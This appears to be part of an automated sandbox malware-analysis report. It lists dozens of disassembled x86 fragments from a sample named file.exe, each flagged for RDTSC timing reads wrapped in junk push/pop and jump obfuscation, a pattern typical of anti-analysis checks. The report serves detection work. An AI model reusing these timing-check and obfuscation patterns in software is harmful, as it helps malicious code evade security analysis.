          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B74C5F second address: B74CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jc 00007F174075FE76h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jg 00007F174075FE76h 0x00000019 ja 00007F174075FE76h 0x0000001f popad 0x00000020 popad 0x00000021 nop 0x00000022 call 00007F174075FE81h 0x00000027 jbe 00007F174075FE78h 0x0000002d push ebx 0x0000002e pop edi 0x0000002f pop ebx 0x00000030 mov ebx, 0F5B2122h 0x00000035 push 00000000h 0x00000037 xor dword ptr [ebp+122D30ABh], eax 0x0000003d push 00000000h 0x0000003f mov ebx, dword ptr [ebp+122D1EFAh] 0x00000045 xchg eax, esi 0x00000046 jmp 00007F174075FE88h 0x0000004b push eax 0x0000004c push edi 0x0000004d push ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72D40 second address: B72D5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3407h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71D7F second address: B71D8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F174075FE7Bh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73EE9 second address: B73EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71D8E second address: B71D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B74E42 second address: B74E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31EB6 second address: B31EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31EC1 second address: B31ED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F17414E33F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31ED0 second address: B31EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F174075FE86h 0x00000009 jo 00007F174075FE76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B782C4 second address: B7836A instructions: 0x00000000 rdtsc 0x00000002 je 00007F17414E33F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F17414E33F8h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 jl 00007F17414E33F8h 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F17414E33F8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 push 00000000h 0x00000039 jmp 00007F17414E3400h 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ebp 0x00000043 call 00007F17414E33F8h 0x00000048 pop ebp 0x00000049 mov dword ptr [esp+04h], ebp 0x0000004d add dword ptr [esp+04h], 0000001Bh 0x00000055 inc ebp 0x00000056 push ebp 0x00000057 ret 0x00000058 pop ebp 0x00000059 ret 0x0000005a mov ebx, dword ptr [ebp+122D3602h] 0x00000060 call 00007F17414E3409h 0x00000065 add ebx, dword ptr [ebp+122D30BFh] 0x0000006b pop edi 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f js 00007F17414E33F8h 0x00000075 pushad 0x00000076 popad 0x00000077 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A29E second address: B7A2BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7947E second address: B79483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A2BC second address: B7A32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d popad 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F174075FE78h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov di, EB73h 0x0000002f adc bx, 8112h 0x00000034 push 00000000h 0x00000036 movzx ebx, di 0x00000039 push eax 0x0000003a pushad 0x0000003b jnl 00007F174075FE8Dh 0x00000041 jmp 00007F174075FE87h 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F174075FE7Ah 0x0000004d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B3F6 second address: B7B3FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A51C second address: B7A59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 jno 00007F174075FE83h 0x0000000f jmp 00007F174075FE7Dh 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov dword ptr [ebp+122D1A31h], ebx 0x00000028 mov eax, dword ptr [ebp+122D1351h] 0x0000002e mov ebx, esi 0x00000030 push FFFFFFFFh 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007F174075FE78h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c jno 00007F174075FE79h 0x00000052 xor edi, dword ptr [ebp+122D1CC4h] 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jp 00007F174075FE7Ch 0x00000061 jns 00007F174075FE76h 0x00000067 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A59D second address: B7A5AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7D27E second address: B7D2DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c and bx, EFE4h 0x00000011 push 00000000h 0x00000013 pushad 0x00000014 add dword ptr [ebp+122D1BD7h], ebx 0x0000001a mov esi, ebx 0x0000001c popad 0x0000001d mov di, dx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F174075FE78h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c sub dword ptr [ebp+1247EA58h], ebx 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jno 00007F174075FE76h 0x0000004d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7D2DD second address: B7D2E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E239 second address: B7E240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E240 second address: B7E24E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7D420 second address: B7D424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E24E second address: B7E25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17414E33FCh 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7F260 second address: B7F264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E3F8 second address: B7E3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7F264 second address: B7F26E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F174075FE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E3FC second address: B7E40B instructions: 0x00000000 rdtsc 0x00000002 js 00007F17414E33F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E4AF second address: B7E4B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7F3BC second address: B7F3C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8017C second address: B80184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7F3C0 second address: B7F444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push ecx 0x0000000a mov edi, 0B842C4Ch 0x0000000f pop ebx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F17414E33F8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov dword ptr [ebp+1247E76Dh], ecx 0x00000037 movsx ebx, cx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push ebx 0x00000044 call 00007F17414E33F8h 0x00000049 pop ebx 0x0000004a mov dword ptr [esp+04h], ebx 0x0000004e add dword ptr [esp+04h], 00000014h 0x00000056 inc ebx 0x00000057 push ebx 0x00000058 ret 0x00000059 pop ebx 0x0000005a ret 0x0000005b mov edi, dword ptr [ebp+1247ACDBh] 0x00000061 mov eax, dword ptr [ebp+122D1029h] 0x00000067 mov dword ptr [ebp+122D2756h], esi 0x0000006d push FFFFFFFFh 0x0000006f js 00007F17414E33FCh 0x00000075 jnl 00007F17414E33F6h 0x0000007b push eax 0x0000007c push ebx 0x0000007d push ebx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8039B second address: B803BD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F174075FE78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F174075FE83h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B803BD second address: B803D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E3401h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B803D2 second address: B803D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8ACE8 second address: B8ACF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AE4C second address: B8AE68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F174075FE76h 0x0000000a jmp 00007F174075FE82h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8B13C second address: B8B161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F17414E3404h 0x0000000a pop edx 0x0000000b ja 00007F17414E3421h 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8B161 second address: B8B174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F174075FE76h 0x0000000d jne 00007F174075FE76h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95448 second address: B9544C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B940C0 second address: B940D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F174075FE7Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B940D4 second address: B940D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B946E7 second address: B94701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F174075FE84h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B94701 second address: B94706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B94706 second address: B9471D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F174075FE82h 0x00000008 jo 00007F174075FE76h 0x0000000e jg 00007F174075FE76h 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9471D second address: B94741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 jmp 00007F17414E3409h 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B94D33 second address: B94D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B94D39 second address: B94D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B94E98 second address: B94EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F174075FE88h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9802A second address: B98036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F17414E33F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B997A4 second address: B997AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B997AB second address: B997B5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F17414E33FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AD14 second address: B9AD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F174075FE76h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AD1E second address: B9AD24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AD24 second address: B9AD40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F174075FE88h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA12C5 second address: BA12D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA12D2 second address: BA131E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F174075FE76h 0x00000008 jmp 00007F174075FE88h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007F174075FE87h 0x00000017 jl 00007F174075FE76h 0x0000001d jns 00007F174075FE76h 0x00000023 popad 0x00000024 push ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA131E second address: BA1324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1498 second address: BA14DC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F174075FE89h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F174075FE87h 0x00000012 jmp 00007F174075FE7Dh 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA14DC second address: BA14E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1646 second address: BA1680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Fh 0x00000007 jmp 00007F174075FE7Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jmp 00007F174075FE87h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1680 second address: BA1685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1685 second address: BA16A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE82h 0x00000007 jp 00007F174075FE82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA16A1 second address: BA16A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA17EC second address: BA1802 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F174075FE76h 0x00000008 jns 00007F174075FE76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1802 second address: BA1806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1806 second address: BA180C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA180C second address: BA1812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1812 second address: BA1823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F174075FE7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA19A4 second address: BA19AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1AE1 second address: BA1AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1EF0 second address: BA1EF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1EF4 second address: BA1EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1EFA second address: BA1F1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jo 00007F17414E33F6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 push edi 0x00000015 pop edi 0x00000016 jbe 00007F17414E33F6h 0x0000001c popad 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6F05 second address: BA6F15 instructions: 0x00000000 rdtsc 0x00000002 je 00007F174075FE76h 0x00000008 je 00007F174075FE76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6F15 second address: BA6F42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3404h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F17414E3403h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5CE1 second address: BA5CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5CE5 second address: BA5D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17414E3408h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FA1D second address: B6FA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FA23 second address: B4F175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jnc 00007F17414E33F9h 0x0000000f lea eax, dword ptr [ebp+12486741h] 0x00000015 movzx edx, si 0x00000018 nop 0x00000019 pushad 0x0000001a pushad 0x0000001b jmp 00007F17414E3400h 0x00000020 jmp 00007F17414E3402h 0x00000025 popad 0x00000026 jmp 00007F17414E3400h 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 jmp 00007F17414E3401h 0x00000036 popad 0x00000037 ja 00007F17414E33F8h 0x0000003d popad 0x0000003e nop 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 call 00007F17414E33F8h 0x00000047 pop eax 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c add dword ptr [esp+04h], 0000001Ch 0x00000054 inc eax 0x00000055 push eax 0x00000056 ret 0x00000057 pop eax 0x00000058 ret 0x00000059 mov edx, dword ptr [ebp+1245E617h] 0x0000005f xor dword ptr [ebp+122D2297h], edi 0x00000065 call dword ptr [ebp+122D1EFAh] 0x0000006b push eax 0x0000006c push edx 0x0000006d jne 00007F17414E3415h 0x00000073 push eax 0x00000074 push edx 0x00000075 pop edx 0x00000076 pop eax 0x00000077 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FB76 second address: B6FB7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FB7A second address: B6FB89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F17414E33F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FEFB second address: B6FF00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FF00 second address: B6FF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7004F second address: B70055 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
